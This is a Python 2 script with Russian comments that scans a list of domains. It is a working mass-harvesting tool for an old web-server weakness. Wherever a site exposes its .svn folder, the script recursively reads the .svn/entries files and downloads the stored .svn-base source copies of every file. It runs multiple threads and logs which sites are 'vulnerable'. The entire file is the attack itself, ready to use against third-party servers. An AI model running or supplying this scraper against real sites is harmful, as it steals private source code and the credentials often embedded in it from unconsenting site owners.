# -*- coding:utf-8 -*-
'''
Created on 23.09.2009

@author: seriy, http://seriyps.ru,  <seriy.pr@gmail.com>
'''
import httplib, urllib
import os, logging
import threading
import time
import config

LEVELS = {'debug': logging.DEBUG,
          'info': logging.INFO,
          'warning': logging.WARNING,
          'error': logging.ERROR,
          'critical': logging.CRITICAL}

logging.basicConfig(level=LEVELS[config.loglevel],
                    format='%(asctime)s	%(levelname)s	%(message)s',
                    filename=config.logFile,
                    filemode='w')

class controller:
	
	def __init__ (self):
		if not (os.access(config.fileSaveDir, os.F_OK) ):
			os.mkdir(config.fileSaveDir)		
		self.domains=open (config.domainsfile)
		
	def getNextDomain (self):
		'''
		Этой функцией потоки получают из файла следующий домен на обработку
		'''
		return self.domains.readline().strip ()

	def startGrab (self):
		for x in xrange(config.threads):
			grabber(x).start()
			time.sleep (0.3)
		print 'All %d threads started!'%config.threads
		logging.info('All %d threads started!'%config.threads)




class grabber(threading.Thread):
	
	domains=None
	curdomain=""
	th_id=None
	report=None

	def __init__ (self, th_id):
		self.th_id=th_id
		threading.Thread.__init__(self)
			
	def run (self):
		'''
		Стартуем граббилку
		'''
		while self.__setNextDomain():
			self.__resetStat()
			try:
				# "ping"
				self.__curConnection=httplib.HTTPConnection(self.curdomain, 80, 5)
				self.__curConnection.close()
			except:
				self.errors[10][1]+=1
				logging.info("Поток %s	%s Сервер недоступен"%(self.th_id, self.curdomain) )
				print self.errors[10]
				continue
			#рекурсивно парсим
			self.__getAllDirs('/', [''])
			self.__makeStat()
		logging.info("Поток %s	завершил работу"%self.th_id)
		print "Поток %s завершил работу"%self.th_id

	
	def __getAllDirs (self, root, dirslist):
		'''
		Грабим все папки из svn на данном домене (рекурсивная функция, вызывает саму себя)
		'''
		for i in xrange (len (dirslist)):
			nextRoot=root+dirslist[i]
			logging.debug("Поток %s	Смотрим директорию %s"%(self.th_id, self.curdomain+nextRoot) )
			fileSystem=self.__getEntries(root, dirslist[i])#читаем .svn/entries

			if fileSystem:
				curSaveDir=config.fileSaveDir+self.curdomain+nextRoot
				if not( os.access(curSaveDir, os.F_OK) ):
					os.mkdir(curSaveDir)
				if len (fileSystem['files'])>0:
					self.stats[10][1]+=len (fileSystem['files'])
					self.__getTextBased(nextRoot, fileSystem['files'])#читаем из .svn/text-based/
				if len (fileSystem['dirs'])>0:
					self.stats[20][1]+=len (fileSystem['dirs'])
					self.__getAllDirs(nextRoot, fileSystem['dirs'])# рекурсия :(((
			elif root=='/' and len (dirslist)==1 and dirslist[0]=='':
				logging.info("Поток %s	На сайте %s нет файла ./svn/entries т.е. уязвимость SVN не обнаружена"%(self.th_id, self.curdomain) )


	def __getTextBased (self, root, files):
		'''
		Качаем и сохраняем файлы files из соответствующей root/.svn/text-based/
		'''
		curSaveDir=config.fileSaveDir+self.curdomain+root
		if not (os.access(curSaveDir, os.F_OK) ):
			os.mkdir(curSaveDir)
		for file in files:
			url="http://"+self.curdomain+root+'.svn/text-base/'+file+'.svn-base'
			logging.debug("Поток %s	Качаем файл %s"%(self.th_id, url) )
			try:
				fileResponse=urllib.urlopen (url)
			except:
				self.errors[20][1]+=1
				logging.error("Поток %s	%s Can't GET file"%(self.th_id, url)) 
				continue
			
			if str (fileResponse.getcode()) != '200':
				self.errors[30][1]+=1
				logging.error ('Поток %s	%s Response status!=200'%(self.th_id, url) )
				continue
			
			resp_body = fileResponse.read()
			outfile=open (curSaveDir+file, "w")
			outfile.write (resp_body)
			outfile.close ()


	def __getEntries (self, root, dir):
		'''
		Качаем и парсим файл entries из папки root+dir
		'''
		try:
			entrConn=urllib.urlopen ("http://"+self.curdomain+root+dir+'.svn/entries')
		except:
			self.errors[40][1]+=1
			logging.error ("Поток %s	%s.svn/entries Can't GET entries"%(self.th_id, self.curdomain+root+dir) )
			return False
		
		if str (entrConn.getcode()) != '200':
			self.errors[50][1]+=1
			logging.error('Поток %s	%s .svn/entries Response status!=200"'%(self.th_id, self.curdomain+root+dir) )
			return False
		entries = entrConn.read()
		return self.__parseEntries(entries)

	
	def __setNextDomain (self):
		'''
		Устанавливаем следующий текущий домен
		'''
		self.curdomain=controller.getNextDomain()
		if self.curdomain != '':
			print self.th_id, "Начинаю", self.curdomain
			logging.info("Поток %s	Начинаю %s"%(self.th_id, self.curdomain) )
			domainSaveDir=config.fileSaveDir+self.curdomain
			if not (os.access(domainSaveDir, os.F_OK) ):
				os.mkdir(domainSaveDir)
			return True
		else:
			return False

	
	def __parseEntries (self, entriesFileContent):
		'''
		Парсим файл entries
		'''
		lines=entriesFileContent.splitlines ()
		out={"dirs":[], "files":[]}
		
		for i in xrange (len (lines)):
			if str (lines[i]) == 'dir' and len( lines[i-1].strip () )>0:
				out['dirs'].append ( lines[i-1].strip ()+"/" )
			elif str (lines[i]) == 'file':
				out['files'].append (lines[i-1].strip () )
		return out

	def __resetStat (self):
		self.errors={10:["Can't connect to server",0],
						20:["Can't GET file",0],
						30:["file Response status!=200",0],
						40:["Can't GET entries",0],
						50:["entries Response status!=200",0]}
		self.stats={10:["Files",0],
						20:["Dirs",0]}

	def __makeStat (self):
		errstring="Errors: "
		for k1 in self.errors:
			errstring+=" %s: %s; "%(self.errors[k1][0], self.errors[k1][1])

		statstring="Stat: "
		for k2 in self.stats.keys():
			statstring+=" %s: %s; "%(self.stats[k2][0],self.stats[k2][1])
		
		print errstring, statstring
		logging.info("Поток %s закончил обрабатывать сайт %s. %s"%(self.th_id, self.curdomain, errstring+" "+statstring) )

	
if __name__ == '__main__':
	try:
		controller=controller ()
		controller.startGrab()
		#ждем пока все ветви подохнут
		while threading.activeCount()>1:
			time.sleep(1)
			
	except KeyboardInterrupt:
		print '\nBye :-*'
		import sys
		sys.exit(0)

